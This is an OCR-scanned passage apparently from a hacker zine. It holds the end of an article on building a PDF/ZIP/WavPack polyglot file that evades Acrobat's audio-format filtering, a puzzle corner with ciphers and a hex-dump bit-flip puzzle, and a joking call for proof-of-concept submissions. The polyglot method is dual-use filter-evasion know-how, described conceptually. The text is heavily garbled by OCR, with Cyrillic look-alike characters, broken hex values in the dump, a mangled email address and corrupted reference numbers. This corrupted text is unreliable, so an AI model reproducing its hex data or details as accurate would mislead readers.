There are some official ways to embed an audio file in a PDF, such as ETFX's media9 package. Unfortu- 
nately, that would only work in Adobe Acrobat Reader, provided that you also install Adobe Flash—quite a 
reckless prerequisite nowadays. We are not such bad neighbors, so we looked for alternatives. 

Adobe, once again, is out to search-and-destroy polyglots, so all common audio file types such as WAV, 
MP3, MAA, 3GP, ААС, FLAC, are prohibited. Still, some less popular formats remain undetected, up until 
now! Among the free lossless formats these are True Audio (.tta) and WavPack (.wv). 

TTA frame structure?? is unfortunately too rigid and doesn't allow much trickery to inject the start of 
the PDF within the first kilobyte. It supports standard tagging by ID3v1/v2 and APEv2, but prepending 
ID3 info is banned by Acrobat. The APEv2 specification,?! on the other hand, strongly recommends against 
using it at the beginning of a file. In practice, audio readers don't support files starting with APEv2. 

The WavPack file format?? is quite unusual, but far more friendly to us: it doesn't have a file header, 
but every block starts with the same magic wvpk. We can add new metadata blocks at the beginning of the 
file, and they support DUMMY sub-blocks, meant for padding. So we can inject the beginning of a PDF, but 
can we use those sub-blocks to inject the full PDF in our WavPack? For each sub-block the theoretical size 
is 16 Mb, but in practice MPlayer accepts a maximum of 1,047,548 bytes and VLC 1,048,548 bytes and only 
one such sub-block per block. бо it's possible, but it would be quite impractical to slice the PDF in 1Mb 
chunks. WavPack also supports ID3v1 and APEv2. ID3v1 is too limited (only ID3v2 allows PRIV frames), 
so we have to rely on APEv2 to inject the bulk of the PDF (and ZIP, as usual) in a large metadata frame. 


We now have the ingredients to WavPack PDF 
build a PDF/ZIP /WavPack polyglot 


file. The final file structure, from the 
three perspectives, is depicted on the 
right. 

All starred items contain a size 
or an offset that depends on another 





PDF header 
obj/stream 


part of the polyglot, so the file is 
built in two passes. The first pass 


puts the elements together, and then 
the second pass adjusts those fields 
in the WavPack and ZIP. 


Local File Headers 
actual content 


Central Directory x 


АРЕм2 footer Ж 


Ву the way, the artwork on page 60 is by Ange and myself, derived from Vectorportal's artwork?? licensed 
under a Creative Commons Attribution 3.0 Unported License. 





9Ünttp://en.true-audio.com/TTA, Lossless, Audio, Codec, - Format Description 
lhttp://wiki.hydrogenaud.io/index.php?title-APEv2 specification 
32http://www.wavpack.com/file_format.txt 

33http://www.vecteezy .com/people/23511-marilyn-monroe-vector 
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13 Oona’s Puzzle Corner! 


by Oona Räisänen 


13.1 Mystery Message 


Peter sits in the front of the classroom. One day during class this message was passed to him. 


>00 SOILMOr LEGLI УСЦО>ОО Ја VI EIL. 
LILI HOL. LEKLkLU <ek< 10> Fo цици 
Cer J0 УПО ПО ><FLiV Se PDTILI 

LIL ILWUe Ie of «EE «PF ЈО>П PIE IEIVET: el 
VIIILL UO JEHO Fo PLI «FL. 


13.2 Bit Flip Trouble 


Mary keeps two copies of a precious file. But one of the copies has been corrupted in memory due to a recent 
Rowhammer attack. Can you find all the flipped bits in the samples below? Can you even tell which one is 
the original? 


0000000: 2550 4446 2431 2e33 0a31 2030 206f 626a 2550 4446 2d31 2e33 0a31 2030 a06f 626a 
0000010: Oa3c 3c20 2#54 7970 6520 2f43 6174 616c Оазс 3c20 2f44 7970 6520 2f4b 6174 616c 
0000020: 6f67 202f 5061 6765 7320 3220 3020 5220 6f67 a02f 5061 6765 7320 3220 3020 5220 
0000030: Зезе 0a65 беба 6f62 баба 3220 3020 6f62 3e3e 0a65 6664 6162 баба 3220 3020 6162 
0000040: баба 3c3c 2025 5479 7065 7320 2150 6167 баба 3c3c a02f 5479 7065 7321 2150 6167 
0000050: 6573 2025 4969 6473 205b 2033 2030 2052 6573 2021 4069 6473 205b 2033 2030 2052 
0000060: 205d 202? 4365 756e 7420 3120 3e3e Оаб5 205d 2021 4361 756e 7420 3120 3e3e 0a65 
0000070: 6e64 6162 баба 3320 3020 662 баба 3c3c 6e64 666 баба 3320 3020 6162 беба 3c3c 
0000080: 2021 5479 7065 2021 5061 6765 202: 5061 2021 5479 7065 2021 5061 6765 2021 5061 
0000090: 7265 6e74 2032 2030 2052 2021 5265 736: 7265 6e74 2032 2030 2052 2024 5245 f36f 
00000a0: 7572 6365 7320 3c3c 2021 4661 6e74 2032 7572 6365 7321 3c3c 2021 4661 6e74 203c 
00000b0: 3c20 2146 3120 3c3c 2025 5479 7065 2024 3с20 2546 3120 3c3c 202: 5479 7065 202: 
00000с0: 4661 6e74 2025 5375 6274 7970 6520 2154 4661 6e74 2024 5375 6274 7970 6521 2154 
00000а0: 7970 6531 2025 4261 7365 4661 6e74 2024 7971 6531 2021 4261 7365 466 6e64 202: 
00000е0: 4172 6961 6c20 3e3e 203e 3e20 Зезе 202: 4172 6961 6с20 Зезе 203e 3e20 Зезе 202 
00000f0: 436f 6e74 656e 7473 2034 2030 2052 203e 4365 6e74 256e 7473 2034 2030 2056 203e 
0000100: Зеба 656e 646f 626a база 2030 206f 626a Зеба 656e 646f 626a база 2030 206f 626a 
0000110: Oa3c 3c3e Зеба 7374 7265 616d 0a42 540a Оазс 3c3e Зеба 7374 7265 616d 0a42 540a 
0000120: 2f46 3120 3430 2054 660a 3430 2037 3030 2f06 3120 3430 2044 620a 3430 2037 3030 
0000130: 2054 640a 2853 7475 6666 2074 6f20 6275 2054 640a 2853 7475 6666 2074 6f20 6275 
0000140: 793a 2920 546a 0a30 202d 3830 2054 640a 793a 2920 546a 0a30 202d 3830 2054 640a 
0000150: 282d 2044 4452 3429 2054 баба 3020 2d38 082d 2044 4452 3329 2054 баба 3020 2438 
0000160: 3020 5464 0a28 2420 6861 7264 2064 7269 3020 5474 0a28 2420 6861 7264 2064 7269 
0000170: 7665 2920 546a 0a45 540a 656e 6473 7472 7665 2921 546a 0a65 540a 656e 6473 7472 
0000180: 6561 баба 656e 646f 626a Оа74 7261 696c 6561 баба 656e e46f 626a 0a74 7261 696c 
0000190: 6572 Oa3c 3c20 2652 6Е6Е 7420 3120 3020 6572 O0a3c 3c20 2f56 6f6f 7420 3120 3020 
00001a0: 523e Зеба 2525 4541 460a 523e Зеба 2525 4541 460a 


Hint: !noisiv oerets ruoy esU 
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13.3 Interpolation Colorization 


Sadie really likes to convolve with this kernel. But she only took with her a travel pack containing a limited 
set of discrete samples. Use a colored pencil to connect the integer-valued dots (1, 2, 3, ...). Then repeat 
using a different color but include also the decimal-valued dots. What do you see? How is this related to 
interpolation and sampling rates? If you recognize the kernel, how would you help Sadie generate even more 
points? 
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13.4 Hacker Jumble 


Max has been trying to memorize some topical words for his upcoming infosec specialist appearance in the 
news. But now they're all lying on his hotel room floor and he has trouble finding them. How many words 
can you find? What has happened to them during the night that makes them so difficult to see? 


FVBGFNGU<AOE BBR B 
UF V SER CHF EGEN FZ 
NH NEA FNGRR UN ZF X J 
PN JEF NJ JER B S P JU / V V 
F YR U E U LB R Z BY УМА 
R QBE AV VJ ZEER RR Q 
R RL ZE QR UN RES LAB 
FJ GY ЈАх ММ ОМА СЈ 
HBYNQHAZTCVANGF 
TRY QRUGZBYES ОМС 
OAWRRCURYQVVVER 
RF Y H QF F EG R BP FE A 
VQOSE RN XB BG Y BQN 
UN PX VAT GR NZ GA VA 
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14 Fast Cash for Cyber Munitions! 


Howdy, neighbor! 

Are you one of those merchants of cyber-death 
that certain Thought Leading Technologists keep 
warning us about? Have you been hoarding bugs 
instead of sharing them with the world? Well, at 
this church we won't judge you, but we'd be happy 
to judge your proofs of concept, sharing the best 
ones with our beloved readers. 

Зо set that little PoC free, neighbor, and let it 
come to me, pastor@phrack.org! 
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by Pastor Manul Laphroaig, 
Unlicensed Proselytizer 
International Church of the Weird Machines 


Do this: write an email telling our editors how to 
do reproduce ONE clever, technical trick from your 
research. If you are uncertain of your English, we'll 
happily translate from French, Russian, Southern 
Appalachian and German. If you don't speak those 
languages, we'll draft a translator from those poor 
sods who owe us favors. 

Like an email, keep it short. Like an email, you 
should assume that we already know more than a 
bit about hacking, and that we'll be insulted or— 
WORSE!—that we'll be bored if you include a long 
tutorial where a quick reminder would do. 

Just use 7-bit ASCII if your language doesn't 
require funny letters, as whenever we receive some- 
thing typeset in OpenOffice, we briefly mistake it 
for a ransom note. Don't try to make it thorough 
or broad. Don't use bullet-points, as this isn't a 
damned Powerpoint deck. Keep your code samples 
short and sweet; we can leave the long-form code as 
an attachment. Do not send us ТЕХ; it's our job 
to do the typesetting! 

Do pick one quick, clever low-level trick and ex- 
plain it in a few pages. Teach me how to turn Davis- 
son's benign tumor from page 26 into а malignant 
tumor. Teach me how to scan the entire APRS-IS 
network for Vogelfrei's tricks from page 34. Don't 
tell me that it's possible; rather, teach me how to 
do it myself with the absolute minimum of formality 
and bullshit. 

Like an email, we expect informal (or faux- 
biblical) language and hand-sketched diagrams. 
Write it in а single sitting, and leave any editing 
for your poor preacherman to do over a bottle of 
fine scotch. Send this to pastor@phrackeorg and 
hope that the neighborly Phrack folks—praise be to 
them!—aren’t man-in-the-middling our submission 
process. 





Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, D.D. 


